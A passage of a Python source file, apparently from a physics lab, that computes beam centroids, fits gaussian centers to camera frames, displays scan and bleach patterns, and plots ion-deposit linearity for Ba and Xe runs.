    plt.xlabel('micrometer position (mm)')
    plt.ylabel('width (micron)')
    plt.legend()
    # NOTE: 'date' is presumably a module-level global -- not defined here
    plt.title(str(date)+' Laser Focus Finding')
    if savepath!=False:
        plt.savefig(savepath+str(date)+'_focus_finder.png')
    if store==True:
        return z,widths
#------------------------------------------------------------------------------------------
# Function to integrate area in 0-order image
def centroid(filename,bounds,**kwargs):
    """Compute the intensity-weighted centroid of a 0-order image region.

    For each requested frame, the centroid of pixel counts inside
    *bounds* = [x0,x1,y0,y1] (1-based, inclusive) is computed and optionally
    plotted on top of the image.  With stats=True an average/StDev summary
    plot is produced and (cent, cent_ave, cent_std) is returned; otherwise
    only the per-frame centroid array is returned.

    NOTE(review): 'date' and the helpers im_sub_dark/im_sub appear to be
    module-level names defined elsewhere in this file; the 'overlay' kwarg
    is read but never used -- verify against callers.
    """
    # Define keyword arguments
    colmap=kwargs.get('cmap','jet')
    frames=kwargs.get('frames','all')
    bgfile=kwargs.get('bgfile',False)
    plt_rect=kwargs.get('plt_rect',True)
    savepath=kwargs.get('savepath',False)
    overlay=kwargs.get('overlay',False)
    scale=kwargs.get('bg_scale',1.)
    shift=kwargs.get('bg_shift',[0,0])
    bgframe=kwargs.get('bg_frame','ave')
    xylim=kwargs.get('axis','default')
    zscale=kwargs.get('z_scale','default')
    stats=kwargs.get('stats',False)
    annotate=kwargs.get('annotate',False)
    # Import modules for array and plotting
    import numpy as np
    import matplotlib.pyplot as plt
    import utility as ut
    import os
    if savepath!=False:
        ut.create_dir(savepath)
    if bgfile==False:
        # Import data and remove cosmics with image_remove_cosmics
        x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,speed='slow')
    # Import data and remove cosmics with image_sub
    else:
        if frames!='all':
            frames=np.array(frames)-1
        x,y,pix,x_max,y_max,N,run=im_sub(filename,bgfile,bg_scale=scale,bg_shift=shift,bg_frame=bgframe,frames=frames)
    if frames=='all':
        frames=range(1,N+1)
    frames=np.array(frames)
    # Find the Centroid
    # bounds are shifted to 0-based array indices here
    bounds=np.array(bounds)-1
    cent=[]
    for i in frames-1:
        # Weight each pixel's 1-based coordinate by its count, then normalize
        # by the total counts in the region to get the centroid
        centx,centy=[],[]
        for j in range(bounds[2],bounds[3]+1):
            for k in range(bounds[0],bounds[1]+1):
                centx.append(pix[i,j,k]*(k+1))
                centy.append(pix[i,j,k]*(j+1))
        cent.append(((1./np.sum(pix[i,bounds[2]:bounds[3]+1,bounds[0]:bounds[1]+1]))*np.sum(centx),(1./np.sum(pix[i,bounds[2]:bounds[3]+1,bounds[0]:bounds[1]+1]))*np.sum(centy)))
    cent=np.array(cent)
    # Plot the frames desired
    if plt_rect==True:
        # j indexes into cent in step with the frame loop
        j=0
        for frame in frames:
            plt.figure('cent_area')
            plt.clf()
            im=plt.imshow(pix[(frame-1),:,:],cmap=colmap,interpolation='nearest')
            plt.plot(cent[j,0],cent[j,1],'ko',markersize=5)
            plt.colorbar(im,orientation='vertical')
            plt.title(run+': frame '+repr(frame))
            plt.xlabel('x Pixel')
            plt.ylabel('y Pixel')
            plt.axis([bounds[0]-2,bounds[1]+2,bounds[2]-2,bounds[3]+2])
            ut.rect(bounds)
            if xylim!='default':
                plt.axis(xylim)
            if zscale!='default':
                plt.clim(zscale)
            plt.show()
            if savepath!=False:
                ut.create_dir(savepath)
                framestr=str(frame).zfill(4)
                plt.savefig(savepath+str(date)+'_run'+str(filename)+'_'+framestr+'_cent_area.png')
            j+=1
    plt.figure('cent_all')
    plt.clf()
    # Plot each centroid position
    plt.figure('cent_all')
    plt.plot(cent[:,0],cent[:,1],'bo')
    plt.title('Centroid for All Frames in '+run)
    plt.xlabel('pixel')
    plt.ylabel('pixel')
    if annotate==True:
        # Label each point with its 1-based frame number
        for i in frames-1:
            plt.annotate(str(i+1),xy=(cent[i,0],cent[i,1]),xytext=(5,5),textcoords='offset points')
    if savepath!=False:
        plt.savefig(savepath+str(date)+'_run'+str(filename)+'centroid_all.png')
    if stats==True:
        # Calculate Average and Standard Deviation
        cent_ave=np.mean(cent,axis=0)
        cent_std=np.std(cent,axis=0)
        # Plot average position
        plt.figure('cent_all')
        plt.plot(cent_ave[0],cent_ave[1],'ro',markersize=8)
        ut.textbox('Average Centroid: ('+str(round(cent_ave[0],2))+','+str(round(cent_ave[1],2))+')\nCentroid StDev: ('+str(round(cent_std[0],2))+','+str(round(cent_std[1],2))+')',[.05,.95])
        if savepath!=False:
            plt.savefig(savepath+'centroid/'+str(date)+'_run'+str(filename)+'centroid_all.png')
        # Remove the textbox, zoom to +/-3 sigma around the mean, re-annotate
        ut.rem('cent_all','text',0)
        plt.axis([cent_ave[0]-3*cent_std[0],cent_ave[0]+3*cent_std[0],cent_ave[1]-3*cent_std[1],cent_ave[1]+3*cent_std[1]])
        ut.textbox('Average Centroid: ('+str(round(cent_ave[0],2))+','+str(round(cent_ave[1],2))+')\nCentroid StDev: ('+str(round(cent_std[0],2))+','+str(round(cent_std[1],2))+')',[.05,.95])
        if savepath!=False:
            plt.savefig(savepath+str(date)+'_run'+str(filename)+'centroid_all_zoom.png')
        return cent,cent_ave,cent_std
    return cent
#------------------------------------------------------------------------------------------
# Function to integrate area in 0-order image
def centroid_scan(filename,center,width,skip,numsteps,**kwargs):
    """Track the centroid of a region that rasters across frames.

    A box of half-widths *width* = [wx, wy] starts at *center* = [cx, cy]
    and is moved frame-by-frame in a serpentine pattern: it advances along x
    every *skip*[0]-th step, reverses direction and steps in y after
    *numsteps*[0] x-steps.  For each frame the intensity-weighted centroid
    inside the (moving) box is computed, plotted, and finally returned.

    NOTE(review): 'date' and the helpers im_sub_dark/im_sub appear to be
    module-level names defined elsewhere in this file; kwargs 'overlay' and
    'cutoff'-style extras are read but unused -- verify against callers.
    """
    # Define keyword arguments
    colmap=kwargs.get('cmap','jet')
    frames=kwargs.get('frames','all')
    bgfile=kwargs.get('bgfile',False)
    plt_rect=kwargs.get('plt_rect',True)
    savepath=kwargs.get('savepath',False)
    overlay=kwargs.get('overlay',False)
    scale=kwargs.get('bg_scale',1.)
    shift=kwargs.get('bg_shift',[0,0])
    bgframe=kwargs.get('bg_frame','ave')
    xylim=kwargs.get('axis','default')
    zscale=kwargs.get('z_scale','default')
    # Import modules for array and plotting
    import numpy as np
    import matplotlib.pyplot as plt
    import utility as ut
    import os
    if savepath!=False:
        ut.create_dir(savepath+'centroid/')
        ut.create_dir(savepath+'centroid/im/')
    if bgfile==False:
        # Import data and remove cosmics with image_remove_cosmics
        x,y,pix,x_max,y_max,N,run=im_sub_dark(filename)
    # Import data and remove cosmics with image_sub
    else:
        if frames!='all':
            frames=np.array(frames)-1
        x,y,pix,x_max,y_max,N,run=im_sub(filename,bgfile,bg_scale=scale,bg_shift=shift,bg_frame=bgframe,frames=frames)
    if frames=='all':
        frames=range(1,N+1)
    frames=np.array(frames)
    # Make a box centered at some pixel to integrate
    # bounds[i,:] = [x0,x1,y0,y1] of the box for frame i
    bounds=np.zeros((N,4),dtype=int)
    bounds[0,:]=[center[0]-width[0],center[0]+width[0],center[1]-width[1],center[1]+width[1]]
    stepsize=[1,1]
    # xinc counts x-steps in the current row, xdir is +-1 travel direction,
    # ymoved flags that a y-step just happened (row change)
    xinc,xdir,ymoved=0,1,0
    for i in range(N):
        if i==0:
            continue
        if xinc==numsteps[0]-1:
            # End of a row: step in y and reverse the x direction
            bounds[i,:]=[bounds[i-1,0],bounds[i-1,1],bounds[i-1,2]+stepsize[1],bounds[i-1,3]+stepsize[1]]
            ymoved=1
            xdir=xdir*-1
        if xinc<numsteps[0]-1:
            # Within a row: move in x only every skip[0]-th frame
            if xinc % skip[0] == 0:
                bounds[i,:]=[bounds[i-1,0]+xdir*stepsize[0],bounds[i-1,1]+xdir*stepsize[0],bounds[i-1,2],bounds[i-1,3]]
            else:
                bounds[i,:]=bounds[i-1,:]
        xinc+=1
        if ymoved==1:
            ymoved,xinc=0,0
    # Find the Centroid
    cent=[]
    for i in frames-1:
        # aoi is the box contents for this frame; centroid is computed in
        # 1-based full-image pixel coordinates
        aoi=pix[i,bounds[i,2]:bounds[i,3]+1,bounds[i,0]:bounds[i,1]+1]
        centx,centy=[],[]
        for j in range(bounds[i,2],bounds[i,3]+1):
            for k in range(bounds[i,0],bounds[i,1]+1):
                centx.append(aoi[j-bounds[i,2],k-bounds[i,0]]*(k+1))
                centy.append(aoi[j-bounds[i,2],k-bounds[i,0]]*(j+1))
        cent.append(((1./np.sum(aoi))*np.sum(centx),(1./np.sum(aoi))*np.sum(centy)))
    cent=np.array(cent)
    # Plot the frames desired
    if plt_rect==True:
        for frame in frames:
            plt.figure('int_area')
            plt.clf()
            im=plt.imshow(pix[(frame-1),:,:],cmap=colmap,interpolation='nearest')
            plt.plot(cent[frame-1][0]-1,cent[frame-1][1]-1,'ko',markersize=5)
            plt.colorbar(im,orientation='vertical')
            plt.title(run+': frame '+repr(frame))
            plt.xlabel('x Pixel')
            plt.ylabel('y Pixel')
            plt.axis([x[0],x[-1],y[0],y[-1]])
            ut.rect(bounds[frame-1,:])
            if xylim!='default':
                plt.axis(xylim)
            if zscale!='default':
                plt.clim(zscale)
            plt.show()
            if savepath!=False:
                ut.create_dir(savepath)
                # Zero-pad the frame number to three digits for the filename
                if frame<=9:
                    framestr='00'+str(frame)
                if 10<=frame<=99:
                    framestr='0'+str(frame)
                if 100<=frame:
                    framestr=str(frame)
                plt.savefig(savepath+'/centroid/im/'+str(date)+'_run'+str(filename)+'_'+framestr+'_cent_area.png')
    plt.figure('cent_all')
    plt.clf()
    # Plot each centroid position
    centxlist,centylist=[],[]
    for i in range(len(cent)):
        # One figure per frame showing just that frame's centroid
        plt.figure('cent_solo')
        plt.clf()
        plt.plot(cent[i][0],cent[i][1],'ro')
        plt.xlabel('x pixel')
        plt.ylabel('y pixel')
        if i+1<=9:
            framestr='00'+str(i+1)
        if 10<=i+1<=99:
            framestr='0'+str(i+1)
        if 100<=i+1:
            framestr=str(i+1)
        plt.title('Centroid Movement '+run+'_fr'+framestr)
        plt.axis([1,np.shape(pix)[2]+1,1,np.shape(pix)[1]+1])
        plt.ylabel('y pixel')
        plt.xlabel('x pixel')
        if savepath!=False:
            plt.savefig(savepath+'centroid/centroid'+str(date)+'_run'+str(filename)+'_fr'+framestr+'.png')
        # Plot all centroid positions
        plt.figure('cent_all')
        plt.plot(cent[i][0],cent[i][1],'ro')
        plt.ylabel('y pixel')
        plt.xlabel('x pixel')
        if savepath!=False:
            plt.savefig(savepath+'centroid/'+str(date)+'_run'+str(filename)+'centroid_all.png')
    return cent
#------------------------------------------------------------------------------------------
# Display the scan pattern and contour for bleaching
def scan_setup(shape_s,spacing_s,width_s,shape_b,spacing_b,width_b,wtype,**kwargs):
    """Display the scan pattern together with the bleaching contour(s).

    Builds gaussian arrays for the scan (shape_s/spacing_s/width_s) and the
    bleach (shape_b/spacing_b/width_b) patterns via funk.gaussarray, shows
    the scan pattern as an image and overlays the requested fractional
    contours of the bleach pattern.  The 'wtype' argument is currently
    unused.  Keyword 'contours' gives the fractions of the bleach maximum to
    draw (default [.9]).
    """
    contours=kwargs.get('contours',[.9])
    # Import modules for array and plotting
    import numpy as np
    import matplotlib.pyplot as plt
    import utility as ut
    import os
    import funk
    # Build the gaussian scan and bleach arrays
    scan_array=funk.gaussarray(shape_s,spacing_s,width_s[0],width_s[1])
    bleach_array=funk.gaussarray(shape_b,spacing_b,width_b[0],width_b[1])
    plt.figure('scan_setup')
    plt.clf()
    # Physical extents (micron) and aspect ratios of the two patterns
    extent_s=[-(shape_s[0]-1)*spacing_s,(shape_s[0]-1)*spacing_s,-(shape_s[1]-1)*spacing_s,(shape_s[1]-1)*spacing_s]
    extent_b=[-(shape_b[0]-1)*spacing_b,(shape_b[0]-1)*spacing_b,-(shape_b[1]-1)*spacing_b,(shape_b[1]-1)*spacing_b]
    aspect_ratio_s=float(shape_s[0])/shape_s[1]
    aspect_ratio_b=float(shape_b[0])/shape_b[1]
    plt.imshow(scan_array,extent=extent_s,aspect=aspect_ratio_s)
    plt.colorbar(orientation='vertical')
    plt.xlabel('x position (micron)')
    plt.ylabel('y position (micron)')
    # Draw the requested fractional contours of the bleach pattern
    level_values=np.array(contours)*np.amax(bleach_array)
    cs=plt.contour(bleach_array,levels=level_values,colors='firebrick',linewidths=3,linestyles=['dashed'],extent=extent_b,aspect=aspect_ratio_b)
    # Label each contour line with its fraction of the maximum
    level_labels={}
    for level,fraction in zip(cs.levels,contours):
        level_labels[level]=str(fraction)
    plt.clabel(cs,inline=1,fmt=level_labels,fontsize=10)
    plt.axis(extent_s)
#------------------------------------------------------------------------------------------
# Display the bleaching expected
def bleach_setup(shape,spacing,width,**kwargs):
    """Display the expected bleaching pattern with fractional contours.

    Builds a gaussian array via funk.gaussarray(shape, spacing, wx, wy,
    start=True), shows it as an image and overlays contour lines at the
    fractions of the maximum given by keyword 'contours' (default [.9]).
    """
    contours=kwargs.get('contours',[.9])
    # Import modules for array and plotting
    import numpy as np
    import matplotlib.pyplot as plt
    import utility as ut
    import os
    import funk
    # Build the gaussian bleach array (start position returned but unused)
    bleach_array,start=funk.gaussarray(shape,spacing,width[0],width[1],start=True)
    plt.figure('scan_setup')
    plt.clf()
    # Physical extent (micron) and aspect ratio of the pattern
    extent_b=[-(shape[0]-1)*spacing,(shape[0]-1)*spacing,-(shape[1]-1)*spacing,(shape[1]-1)*spacing]
    aspect_ratio_b=float(shape[0])/shape[1]
    plt.imshow(bleach_array,extent=extent_b,aspect=aspect_ratio_b)
    plt.colorbar(orientation='vertical')
    plt.xlabel('x position (micron)')
    plt.ylabel('y position (micron)')
    # Draw the requested fractional contours
    level_values=np.array(contours)*np.amax(bleach_array)
    cs=plt.contour(bleach_array,levels=level_values,colors='firebrick',linewidths=3,linestyles=['dashed'],extent=extent_b,aspect=aspect_ratio_b)
    # Label each contour line with its fraction of the maximum
    level_labels={}
    for level,fraction in zip(cs.levels,contours):
        level_labels[level]=str(fraction)
    plt.clabel(cs,inline=1,fmt=level_labels,fontsize=10)
    plt.axis(extent_b)
#------------------------------------------------------------------------------------------
def gauss_center(data,xfit,yfit,xint,yint,p0,**kwargs):
    """Fit 1D gaussians to the x and y cross sections of *data*.

    xfit/yfit are the 1-based pixel ranges fit along each axis; xint/yint
    are the ranges summed over to build each profile.  p0 is
    [amp, xcen, ycen, xwidth, ywidth].  Keyword 'only' selects which
    profile(s) to fit ('x', 'y', or anything else for both); the return is
    the fitted x center, the fitted y center, or the (x, y) pair accordingly.
    """
    savepath=kwargs.get('savepath',False)
    run=kwargs.get('run',0)
    fig=kwargs.get('fig','')
    highlander=kwargs.get('only','both')
    # Import modules for array and plotting
    import numpy as np
    import matplotlib.pyplot as plt
    import utility as ut
    import os
    if savepath!=False:
        ut.create_dir(savepath+'gauss_prof/')
    def gauss(x,amp,cen,width):
        # 1/e^2 gaussian used as the fit model
        return amp*np.exp(-2*np.square(x-cen)/(np.square(width)))
    # Collapse the 2D data onto each axis over the integration strips
    y_axis=np.arange(yfit[0],yfit[1]+1)
    y_counts=np.sum(data[yfit[0]-1:yfit[1],xint[0]-1:xint[1]],axis=1)
    yprof=np.vstack((y_axis,y_counts))
    x_axis=np.arange(xfit[0],xfit[1]+1)
    x_counts=np.sum(data[yint[0]-1:yint[1],xfit[0]-1:xfit[1]],axis=0)
    xprof=np.vstack((x_axis,x_counts))
    # Fit 1D gaussian to each requested cross section
    if highlander!='y':
        xparam=ut.fitter1d(gauss,xprof,[p0[0],p0[1],p0[3]],fig='xprof'+fig)
        ut.textbox('Center: '+str(round(xparam[1],2))+'\nWidth: '+str(round(xparam[2],2)),[.05,.95])
        if savepath!=False:
            plt.savefig(savepath+'gauss_prof/run'+str(run)+'xprof.png')
    if highlander!='x':
        yparam=ut.fitter1d(gauss,yprof,[p0[0],p0[2],p0[4]],fig='yprof'+fig)
        ut.textbox('Center: '+str(round(yparam[1],2))+'\nWidth: '+str(round(yparam[2],2)),[.05,.95])
        if savepath!=False:
            plt.savefig(savepath+'gauss_prof/run'+str(run)+'yprof.png')
    if highlander=='x':
        return xparam[1]
    if highlander=='y':
        return yparam[1]
    return xparam[1],yparam[1]
#------------------------------------------------------------------------------------------
def center_find(filename,fitbnds,**kwargs):
    """Find the beam center in each frame by 2D-gaussian fit or centroid.

    *fitbnds* = [x0,x1,y0,y1] restricts the region used for the fit.  Frames
    whose peak is at least 3.5x the regional mean are processed; for each,
    the (x, y) center is appended to param_all.  Returns
    (param_all, frames_fit) where frames_fit lists the 1-based frame numbers
    that passed the threshold.

    NOTE(review): 'date' and im_sub_dark appear to be module-level names
    defined elsewhere in this file; the 'store' kwarg is read but unused.
    """
    # Define keyword arguments
    colmap=kwargs.get('cmap','jet')
    frames=kwargs.get('frames','all')
    store=kwargs.get('store',False)
    savepath=kwargs.get('savepath',False)
    units=kwargs.get('units','pixel')
    speed=kwargs.get('speed','slow')
    fit=kwargs.get('fit','gauss')
    plot_each=kwargs.get('plot_each',True)
    # Import modules for array and plotting
    import numpy as np
    import matplotlib.pyplot as plt
    import os
    import utility as ut
    import lv_analysis as lv
    from lmfit import minimize,Parameters,Parameter,Model
    # Output subdirectory is named after the fit method
    subdir=fit+'_center/'
    if savepath!=False:
        ut.rm_dir(savepath+subdir)
        ut.create_dir(savepath+subdir)
    # Import data and remove cosmics with image_remove_cosmics
    x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,speed=speed)
    # Slice data for just fit bounds
    pixslice=pix[:,fitbnds[2]:fitbnds[3]+1,fitbnds[0]:fitbnds[1]+1]
    x,y=np.arange(fitbnds[0],fitbnds[1]+1),np.arange(fitbnds[2],fitbnds[3]+1)
    if frames=='all':
        frames=range(1,N+1)
    # Define 2d gaussian
    def gauss2d_flat(x,y,amp,xcenter,ycenter,xwidth,ywidth): # This ends up as f(y,x)
        my,mx=np.meshgrid(x,y)
        # Convert full widths to half widths for the 1/e^2 form
        xwidth,ywidth=xwidth/2.,ywidth/2.
        return np.ravel(amp*np.exp(-2*(np.square(mx-ycenter)/(np.square(ywidth))))*np.exp(-2*(np.square(my-xcenter))/(np.square(xwidth))))
    param_all,frames_fit=[],[]
    # Initial guess: amplitude 500, center of the fit box, width 2 px
    p0=[500,np.mean([fitbnds[0],fitbnds[1]]),np.mean([fitbnds[2],fitbnds[3]]),2,2]
    p_0s=['amp','xcenter','ycenter','xwidth','ywidth']
    for frame in frames:
        f=frame-1
        data=pixslice[f,:,:]
        # Only fit frames with a clear peak above the regional mean
        if np.amax(data)>=3.5*np.mean(data):
            if fit=='gauss':
                # Define x,y grid and p_0 names
                func_model=Model(gauss2d_flat,independent_vars=['x','y'],param_names=p_0s)
                result=func_model.fit(np.ravel(data),x=x,y=y,amp=p0[0],xcenter=p0[1],ycenter=p0[2],xwidth=p0[3],ywidth=p0[4],verbose=False)
                # NOTE(review): +1 is applied to ycenter but not xcenter --
                # verify the intended coordinate convention
                param_all.append([result.best_values['xcenter'],result.best_values['ycenter']+1])
                frames_fit.append(frame)
            if fit=='centroid':
                # Find the Centroid
                bounds=np.array(fitbnds)-1
                centx,centy=[],[]
                for j in range(bounds[2],bounds[3]+1):
                    for k in range(bounds[0],bounds[1]+1):
                        centx.append(pix[f,j,k]*(k+1))
                        centy.append(pix[f,j,k]*(j+1))
                param_all.append(((1./np.sum(pix[f,bounds[2]:bounds[3]+1,bounds[0]:bounds[1]+1]))*np.sum(centx),(1./np.sum(pix[f,bounds[2]:bounds[3]+1,bounds[0]:bounds[1]+1]))*np.sum(centy)))
                #centx,centy=[],[]
                #for l in range(fitbnds[2]-1,fitbnds[3]):
                #for k in range(fitbnds[0]-1,fitbnds[1]):
                #centx.append(pix[f,l,k]*(k+1))
                #centy.append(pix[f,l,k]*(l+1))
                #param_all.append([(1./np.sum(data))*np.sum(centx),(1./np.sum(data))*np.sum(centy)])
                frames_fit.append(frame)
    param_all=np.array(param_all)
    meanpos=np.mean(param_all,axis=0)
    if units=='micron':
        # 5 micron per pixel conversion
        param_all=5*param_all
    # Plot the frames desired
    if plot_each==True:
        for j in range(np.shape(param_all)[0]):
            plt.figure(fit+'_fit')
            plt.clf()
            im=plt.imshow(pix[frames_fit[j]-1,:,:],cmap=colmap,interpolation='nearest')
            plt.plot(param_all[j,0]-1,param_all[j,1]-1,'ko',markersize=4)
            plt.colorbar(im,orientation='vertical')
            plt.title(run+': frame '+repr(frames_fit[j]))
            if units=='pixel':
                plt.xlabel('x Pixel')
                plt.ylabel('y Pixel')
                plt.axis([fitbnds[0],fitbnds[1],fitbnds[2],fitbnds[3]])
            if units=='micron':
                plt.xlabel('x (micron)')
                plt.ylabel('y (micron)')
                plt.axis([fitbnds[0]*5,fitbnds[1]*5,fitbnds[2]*5,fitbnds[3]*5])
            ut.textbox('('+str(round(param_all[j,0],1))+','+str(round(param_all[j,1],1))+')',[.05,.95])
            plt.show()
            if savepath!=False:
                plt.savefig(savepath+subdir+str(date)+'_run'+str(filename)+'_'+str(frames_fit[j]).zfill(3)+'_'+fit+'_center.png')
    # Plot just the centers
    plt.figure('all_'+fit+'_centers')
    plt.clf()
    plt.plot(param_all[:,0],param_all[:,1],'bo')
    plt.title(str(date)+' run'+str(filename)+' Center for All Frames')
    if units=='pixel':
        plt.xlabel('x Pixel')
        plt.ylabel('y Pixel')
        #plt.axis([meanpos[0]-3,meanpos[0]+3,meanpos[1]-3,meanpos[1]-3])
    if units=='micron':
        plt.xlabel('x (micron)')
        plt.ylabel('y (micron)')
        plt.axis([fitbnds[0]*5,fitbnds[1]*5,fitbnds[2]*5,fitbnds[3]*5])
    #ut.textbox('Fit Bounds: '+repr(fitbnds),[.05,.95])
    if savepath!=False:
        plt.savefig(savepath+subdir+str(date)+'_run'+str(filename)+'_'+fit+'_center_all.png')
        ut.save(np.transpose(param_all),['x pixel','ypixel'],savepath+subdir+str(date)+'_run'+str(filename)+'_'+fit+'_center_all.txt')
    return param_all,frames_fit
#------------------------------------------------------------------------------------------
# create linearity plots for ion deposits
def linearity(l_area,T_R,**kwargs):
    """Create linearity plots (integrated counts vs deposited ions).

    For every run in the day's run list, the signal inside *l_area* is
    integrated, normalized by laser energy, and plotted against the number
    of ions inferred from the cup charge per pulse.  Xe-only runs
    (pulselist == -1) provide the background level; zero-pulse runs
    (pulselist == 0) are plotted separately.  A line is fit to the
    background-subtracted data and three figures are produced (raw,
    subtracted, Xe-only statistics).

    Returns (ions, ints, ints_sub, xe, zp, runlist).

    NOTE(review): 'date', 'null_pulse', 'funk', gauss2d_fit and im_int_0 are
    module-level names defined elsewhere in this file; kwargs 'axis',
    'cutoff' and 'charge' are read but unused -- verify against callers.
    """
    xwidth=kwargs.get('xwidth',3)
    ywidth=kwargs.get('ywidth',3)
    savepath=kwargs.get('savepath',False)
    A_obs=kwargs.get('A_obs',8.6)
    axis=kwargs.get('axis','default')
    bndfind=kwargs.get('chgbnds','auto')
    vib=kwargs.get('vib_shutter',True)
    int_area=kwargs.get('int_area','manual')
    cutoff=kwargs.get('cutoff',5.)
    bndtype=kwargs.get('boundtype','edge')
    fit0=kwargs.get('fit0',True)
    charge=kwargs.get('charge','cup')
    drops=kwargs.get('runs2skip',[])
    ionlim=kwargs.get('ion_limit','all')
    # Import modules for array and plotting
    import numpy as np
    import matplotlib.pyplot as plt
    import os
    import utility as ut
    import lv_analysis as lv
    import gen_reader as gr
    import scope_cal as scp
    import scipy.special as sp
    if savepath!=False:
        ut.create_dir(savepath)
        savescope=savepath+'scope/'
        ut.create_dir(savescope)
    else:
        savescope=savepath
    # make l_area the edges of integral area
    if bndtype=='center':
        l_area=[l_area[0]-.5*l_area[2],l_area[0]+.5*l_area[2],l_area[1]-.5*l_area[3],l_area[1]+.5*l_area[3]]
    # import rundata.csv to set up lists
    runlist,lvlist,scplist,pulselist=ut.data_lists(date)
    # be able to ignore runs
    drops_i=[]
    for i in drops:
        drops_i.append(np.where(runlist==i)[0][0])
    runlist,lvlist,scplist,pulselist=np.delete(runlist,drops_i),np.delete(lvlist,drops_i),np.delete(scplist,drops_i,axis=1),np.delete(pulselist,drops_i)
    # calculate charge correction for each pulse
    pulsecorr=.802*sp.erf(.007*pulselist)
    # calculate charge/pulse for cup3 with correction
    fC=pulsecorr*scp.pulse_charge_lin(scplist,null_pulse,savepath=savescope,cutoff=7.,chan=3,bounds=bndfind)
    # integrate signal,scale by mW*s and calculate number of ions
    # k tracks the row index in pulselist/fC alongside the runlist loop
    k=0
    ions,ints,labels,xe,zp,energy,pos=[],[],[],[],[],[],[]
    for i in runlist:
        labels.append('run'+str(i))
        # Get laser energy (power * exposure time)
        if vib==True:
            energy.append(1000*lv.lv_energy(i,T_R=T_R)[0])
        if vib=='old':
            energy.append(np.mean(lv.lv_pow(lvlist[np.where(runlist==i)[0][0]],T_R=T_R))*np.mean(lv.lv_time(lvlist[np.where(runlist==i)[0][0]])))
        # old way of calculating energy
        if vib==False:
            energy.append(1E3)
        # Do the integral
        if int_area=='auto':
            # Find center of laser
            param,cov,fr=gauss2d_fit(i,l_area,savepath=savepath)
            pos.append(param[0,:]+1)
            if savepath!=False:
                integral=im_int_0(i,[param[0,0],param[0,1],xwidth,ywidth],boundtype='center',savepath=savepath+'ints/',overlay=True,axis=l_area)
            if savepath==False:
                integral=im_int_0(i,[param[0,0],param[0,1],xwidth,ywidth],boundtype='center',overlay=True,axis=l_area)
        if int_area=='manual':
            pos.append([np.mean(l_area[:2]),np.mean(l_area[2:])])
            if savepath!=False:
                integral=im_int_0(i,l_area,boundtype='edge',savepath=savepath+'ints/',overlay=True,axis=[l_area[0]-5,l_area[1]+5,l_area[2]-5,l_area[3]+5])
            if savepath==False:
                integral=im_int_0(i,l_area,boundtype='edge',overlay=True,axis=[l_area[0]-5,l_area[1]+5,l_area[2]-5,l_area[3]+5])
            xwidth,ywidth=l_area[1]-l_area[0],l_area[3]-l_area[2]
        ints.append(integral[0])
        # Find number of ions from pulse data
        # pulselist == -1 marks Xe-only runs, 0 marks zero-pulse runs
        if pulselist[k]==-1:
            ions.append(0.)
            xe.append(k)
        if pulselist[k]==0:
            ions.append(0.)
            zp.append(k)
        if pulselist[k] not in [0,-1]:
            ions.append(.8*pulselist[k]*(fC[1,k]/1.602E-4)*(A_obs/(np.pi*np.square(1.4E3)))*.5)
        k+=1
    ions=np.array(ions)
    # Normalize integrated counts by laser energy
    ints=np.array(ints)/np.array(energy)
    pos=np.array(pos)
    # option to fit only lower ion runs
    low=[]
    if ionlim!='all':
        for i in range(len(ions)):
            if ions[i]<=ionlim:
                low.append(i)
        # NOTE(review): np.take(fC,low) has no axis argument, so the 2D fC
        # array is flattened before selection -- verify this is intended
        ions,ints,pos,runlist,pulselist,fC=np.take(ions,low),np.take(ints,low),np.take(pos,low,axis=0),np.take(runlist,low),np.take(pulselist,low),np.take(fC,low)
        # Re-assign indicies to xe and zero-pulse runs
        xe,zp=[],[]
        for k in range(len(pulselist)):
            if pulselist[k]==-1:
                xe.append(k)
            if pulselist[k]==0:
                zp.append(k)
    # Subtract average of surrounding Xe BG runs from pulse runs
    ints_sub=np.zeros(np.shape(ints))
    for i in range(len(runlist)):
        if pulselist[i]!=-1:
            # Nearest Xe run after, then nearest Xe run before
            for j in range(len(runlist)-(i+1)):
                if pulselist[i+(j+1)]==-1:
                    xe_after=ints[i+(j+1)]
                    break
            for k in range(i):
                if pulselist[i-(k+1)]==-1:
                    xe_before=ints[i-(k+1)]
                    break
            ints_sub[i]=ints[i]-np.mean([xe_before,xe_after])
    ints_sub_0=np.take(ints_sub,zp)
    ions_sub_0=np.take(ions,zp)
    # Save the data in ascii
    if savepath!=False:
        ut.save(np.vstack((runlist,ions,ints,fC,pos[:,0],pos[:,1])),['run','ions','counts','fC/pulse','xpos','ypos'],savepath+'rundata.txt')
        ut.save(np.delete(np.vstack((runlist,ions,ints_sub,fC,pos[:,0],pos[:,1])),xe,axis=1),['run','ions','counts(sub)','fC/pulse','xpos','ypos'],savepath+'rundata_sub.txt')
        ut.save(np.take(np.vstack((runlist,ions,ints,fC,pos[:,0],pos[:,1])),xe,axis=1),['run','ions','counts','fC/pulse','xpos','ypos'],savepath+'bg_data.txt')
    #Fit line to data
    if fit0==False:
        params_line=ut.fitter1d(funk.poly,np.vstack((np.delete(ions,xe),np.delete(ints_sub,xe))),[0,200])
        fitx=np.linspace(-1,1.1*np.amax(np.delete(ions,xe)),20)
        fit=funk.poly(np.linspace(-1,1.1*np.amax(np.delete(ions,xe)),20),params_line[0],params_line[1])
    if fit0==True:
        params_line=ut.fitter1d(funk.line0,np.vstack((np.delete(ions,xe),np.delete(ints_sub,xe))),[200])
        fitx=np.linspace(-1,1.1*np.amax(np.delete(ions,xe)),20)
        fit=funk.line0(np.linspace(-1,1.1*np.amax(np.delete(ions,xe)),20),params_line[0])
    # Make the Linearity Plot
    plt.figure('linearity')
    plt.clf()
    plt.plot(np.delete(ions,xe),np.delete(ints,xe),'bo')
    plt.plot(np.take(ions,xe),np.take(ints,xe),'ro')
    plt.plot(np.take(ions,zp),np.take(ints,zp),'go')
    plt.plot(fitx,fit+np.mean(np.take(ints,xe)),'r--')
    plt.xlabel('Number of Ions in Laser Region')
    plt.title(str(date)+ ' Linearity Plot',fontsize=12)
    plt.ylabel('Integrated Counts per mW in First Frame ('+str(xwidth)+'x'+str(ywidth)+' Region)')
    plt.legend(['Ba Runs','Xe Runs','0-pulse Runs'],numpoints=1,fontsize=12,loc=2)
    for label,x,y in zip(labels,ions,ints):
        plt.annotate(label,xy=(x,y),xytext=(0,5),textcoords='offset points',ha = 'left',va ='bottom')
    plt.xlim(-1,1.25*np.amax(ions))
    if np.amax(ints)>=1E3:
        ut.sci()
    plt.show()
    if savepath!=False:
